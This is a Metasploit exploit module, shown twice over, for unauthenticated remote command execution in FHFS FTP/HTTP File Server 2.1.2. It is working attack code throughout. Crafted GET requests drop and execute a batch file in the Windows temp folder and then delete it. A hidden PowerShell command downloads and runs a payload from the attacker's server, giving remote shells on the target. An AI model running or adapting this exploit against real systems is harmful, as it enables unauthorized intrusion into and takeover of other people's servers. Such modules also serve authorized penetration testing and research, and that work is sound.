ztgrace/fhfs_rce.rb

## fhfs_rce.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Powershell
  #include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "FHFS - FTP/HTTP File Server 2.1.2",
      'Description'    => %q{
        FHFS FTP/HTTP File Server (FHFS) is vulnerable to a remote command execution attack.
        The exec command allows for unauthenticated command execution on the host system.
        However, testing idicated that it failed to process anything other than a base command.
        This module combines the exec and save commands to achieve arbitrary code execution using
        powershell. Note: due to the way the server processes commands, this module should spawn
        two shells.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Naser Farhadi', # Original Exploit Author
          'Zach Grace @ztgrace', # metasploit author
          'Trenton Ivey @TrentonIvey', # metasploit author
        ],
      'References'     =>
        [
          ['URL', 'https://www.exploit-db.com/exploits/37985/'],
          ['URL', 'https://warroom.securestate.com/index.php/tag/fhfs/'],
        ],
      'Payload'        => { 'BadChars' => "\x0d\x0a\x00\x20" },
      'Space'          => 2014,
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
        ],
      'Privileged'     => true,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DisclosureDate' => "Aug 27 2015",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
          OptInt.new('HTTPDELAY',    [false, 'Seconds to wait before terminating web server', 30]),
        ], self.class)
  end

  def check
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => '/'
    })

    if res &&  res.headers['Server'] && res.headers['Server'] =~ /FHFS - FTP\/HTTP File Server - v([\d.]+)/
      version = $1
      print_status("FHFS version: #{version}")
      if version == "2.1.2"
        return Exploit::CheckCode::Vulnerable
      else
        return Exploit::CheckCode::Safe
      end
    end
  end

  def on_request_uri(cli, req)
    print_status("#{peer} - Payload request received: #{req.uri}")
    data = cmd_psh_payload(
                            payload.encoded,
                            payload_instance.arch.first,
                            remove_comspec: true,
                            use_single_quotes: true
                          )
    send_response(cli, data, 'Content-Type' => 'application/octet-stream')
  end

  def psh_cmd
      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
      download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{get_uri}'))"
      cmd = generate_psh_command_line(
                                             noprofile: true,
                                             windowstyle: 'hidden',
                                             command: download_and_run
                                           )
      print_status("Command to execute: #{cmd}")
      return cmd
  end

  def primer
    file_name = rand_text_alpha(10)
    file_name << ".bat"
    batch_path = "C:\\Windows\\Temp\\#{file_name}"

    cmd = psh_cmd

    payloads = [
      "/?{.save|#{batch_path}|{.decodeuri|#{URI::escape(cmd)}.}.}", # dropper
      "/?{.exec|#{batch_path}.}", # command execution
      "/?{.delete|#{batch_path}.}",
    ]

    payloads.each do |payload|
      if datastore['VERBOSE']
        print_status("Sending payload: #{payload}")
      end

      send_request_raw({
        'method' => 'GET',
        'uri' => payload,
        'timeout' => 20,
      })
      sleep 2
    end
  end

  def exploit
    begin
      Timeout.timeout(datastore['HTTPDELAY']) { super }
    rescue Timeout::Error
      # When the server stops due to our timeout, this is raised
    end
  end
end
	##
	# This module requires Metasploit: http://metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer
	include Msf::Exploit::Powershell
	#include Msf::Exploit::FileDropper

	def initialize(info={})
	super(update_info(info,
	'Name' => "FHFS - FTP/HTTP File Server 2.1.2",
	'Description' => %q{
	FHFS FTP/HTTP File Server (FHFS) is vulnerable to a remote command execution attack.
	The exec command allows for unauthenticated command execution on the host system.
	However, testing idicated that it failed to process anything other than a base command.
	This module combines the exec and save commands to achieve arbitrary code execution using
	powershell. Note: due to the way the server processes commands, this module should spawn
	two shells.
	},
	'License' => MSF_LICENSE,
	'Author' =>
	[
	'Naser Farhadi', # Original Exploit Author
	'Zach Grace @ztgrace', # metasploit author
	'Trenton Ivey @TrentonIvey', # metasploit author
	],
	'References' =>
	[
	['URL', 'https://www.exploit-db.com/exploits/37985/'],
	['URL', 'https://warroom.securestate.com/index.php/tag/fhfs/'],
	],
	'Payload' => { 'BadChars' => "\x0d\x0a\x00\x20" },
	'Space' => 2014,
	'Platform' => 'win',
	'Targets' =>
	[
	[ 'Automatic', {} ],
	],
	'Privileged' => true,
	'Stance' => Msf::Exploit::Stance::Aggressive,
	'DisclosureDate' => "Aug 27 2015",
	'DefaultTarget' => 0))

	register_options(
	[
	OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
	OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 30]),
	], self.class)
	end

	def check
	res = send_request_raw({
	'method' => 'GET',
	'uri' => '/'
	})

	if res && res.headers['Server'] && res.headers['Server'] =~ /FHFS - FTP\/HTTP File Server - v([\d.]+)/
	version = $1
	print_status("FHFS version: #{version}")
	if version == "2.1.2"
	return Exploit::CheckCode::Vulnerable
	else
	return Exploit::CheckCode::Safe
	end
	end
	end

	def on_request_uri(cli, req)
	print_status("#{peer} - Payload request received: #{req.uri}")
	data = cmd_psh_payload(
	payload.encoded,
	payload_instance.arch.first,
	remove_comspec: true,
	use_single_quotes: true
	)
	send_response(cli, data, 'Content-Type' => 'application/octet-stream')
	end

	def psh_cmd
	ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
	download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{get_uri}'))"
	cmd = generate_psh_command_line(
	noprofile: true,
	windowstyle: 'hidden',
	command: download_and_run
	)
	print_status("Command to execute: #{cmd}")
	return cmd
	end

	def primer
	file_name = rand_text_alpha(10)
	file_name << ".bat"
	batch_path = "C:\\Windows\\Temp\\#{file_name}"

	cmd = psh_cmd

	payloads = [
	"/?{.save\|#{batch_path}\|{.decodeuri\|#{URI::escape(cmd)}.}.}", # dropper
	"/?{.exec\|#{batch_path}.}", # command execution
	"/?{.delete\|#{batch_path}.}",
	]

	payloads.each do \|payload\|
	if datastore['VERBOSE']
	print_status("Sending payload: #{payload}")
	end

	send_request_raw({
	'method' => 'GET',
	'uri' => payload,
	'timeout' => 20,
	})
	sleep 2
	end
	end

	def exploit
	begin
	Timeout.timeout(datastore['HTTPDELAY']) { super }
	rescue Timeout::Error
	# When the server stops due to our timeout, this is raised
	end
	end
	end